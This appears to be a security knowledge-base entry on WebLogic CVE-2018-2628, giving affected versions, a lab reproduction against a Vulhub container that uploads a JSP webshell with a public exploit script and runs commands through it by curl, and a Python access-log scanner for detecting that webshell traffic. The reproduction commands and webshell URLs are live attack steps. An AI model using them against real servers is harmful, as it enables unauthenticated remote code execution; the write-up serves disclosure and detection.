
WebLogic — CVE-2018-2628

Updated 26 May 2026

Background

WebLogic WLS Core Components Deserialization RCE

CVSS: 9.8 Critical
VECTOR: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
IMPACT: Remote code execution
AFFECTED:
  WebLogic 10.3.6.0 < CPU Apr 2018
  WebLogic 12.1.3.0 < CPU Apr 2018
  WebLogic 12.2.1.2 < CPU Apr 2018
  WebLogic 12.2.1.3 < CPU Apr 2018

An unauthenticated deserialization vulnerability in Oracle WebLogic's WLS Core Components. A remote attacker can send a crafted serialized Java object over the T3 protocol to execute arbitrary code on the server.

Reproduction

POC || GTFO

Exploitable using jas502n's CVE-2018-2628-Getshell.py. The uploaded webshell is one-time-use — it is removed after executing a command.

Tested against Vulhub's weblogic:10.3.6.0-2017 image:

```zsh
docker container ls
CONTAINER ID   IMAGE                             COMMAND              CREATED       STATUS
f3b474a990a1   vulhub/weblogic:10.3.6.0-2017    "startWebLogic.sh"   5 hours ago   Up 5 hours
```

Upload webshell

```zsh
python2.7 CVE-2018-2628-Getshell.py 127.0.0.1 7003 shell1.jsp
>>>Shell File Upload Dir:  servers\AdminServer\tmp\_WL_internal\bea_wls_internal\9j4dqk\war\shell1.jsp
>>>Getshell: http://127.0.0.1:7003/bea_wls_internal/shell1.jsp?tom=d2hvYW1pCg==
```

Execute command

```zsh
curl http://127.0.0.1:7003/bea_wls_internal/shell1.jsp\?tom\=aG9zdG5hbWU\=
->|vuln-weblogic
|<-%
```
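The webshell stage leaves a distinctive trace in the WebLogic HTTP access log: a JSP served from under /bea_wls_internal/ (the directory the shell was uploaded to above) with a base64-encoded command in the query string. The following Python is an added detection example, not part of this knowledge-base entry or of jas502n's script; the log lines, addresses and timestamps are constructed, while the parameter name `tom` and the two base64 values are the ones shown on the page. It parses Common Log Format lines, flags JSP requests under that path, and decodes any query value that is strict base64 for printable text so an analyst can see the command at a glance.

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Common Log Format). Addresses and
# timestamps are made up; only the request targets mirror the page's webshell URLs.
SAMPLE_LOG = """\
10.0.0.5 - - [26/May/2026:10:01:02 +0000] "GET /console/login/LoginForm.jsp?lang=en HTTP/1.1" 200 1532
10.0.0.9 - - [26/May/2026:10:02:11 +0000] "GET /bea_wls_internal/shell1.jsp?tom=d2hvYW1pCg== HTTP/1.1" 200 21
10.0.0.9 - - [26/May/2026:10:02:40 +0000] "GET /bea_wls_internal/shell1.jsp?tom=aG9zdG5hbWU= HTTP/1.1" 200 14
10.0.0.7 - - [26/May/2026:10:03:00 +0000] "GET /bea_wls_internal/ HTTP/1.1" 404 0
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Directory the page's webshell was written under; JSPs served from here are not expected.
WEBSHELL_DIR = "/bea_wls_internal/"


def decode_b64_param(value):
    """Return the decoded text if `value` is strict base64 for printable ASCII, else None."""
    try:
        raw = base64.b64decode(value, validate=True)
    except ValueError:  # binascii.Error (bad alphabet or padding) is a ValueError subclass
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    if not text or not all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return None
    return text


def analyse_target(target):
    """Return the reasons a request target looks like webshell traffic (empty list if clean)."""
    parts = urlsplit(target)
    findings = []
    if parts.path.startswith(WEBSHELL_DIR) and parts.path.lower().endswith(".jsp"):
        findings.append("JSP served from %s" % WEBSHELL_DIR)
        # Any base64-decodable query value is reported with its plaintext for triage.
        for name, values in parse_qs(parts.query, keep_blank_values=True).items():
            for value in values:
                decoded = decode_b64_param(value)
                if decoded is not None:
                    findings.append("parameter %s is base64 for %r" % (name, decoded.strip()))
    return findings


def scan_log(text):
    """Parse CLF lines and return one record per request that produced a finding."""
    hits = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if match is None:
            continue  # not a CLF line; skip rather than guess
        findings = analyse_target(match.group("target"))
        if findings:
            hits.append({
                "src": match.group("src"),
                "ts": match.group("ts"),
                "target": match.group("target"),
                "status": int(match.group("status")),
                "findings": findings,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ts"], hit["src"], hit["target"])
        for reason in hit["findings"]:
            print("   -", reason)
```

This only catches the second stage. The deserialization itself travels over T3 on the same listen port and never appears in the HTTP access log, so the fix for the first stage remains applying the April 2018 CPU and, where T3 is not needed from untrusted networks, not exposing it.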

[Figure: Running CVE-2018-2628-Getshell.py]
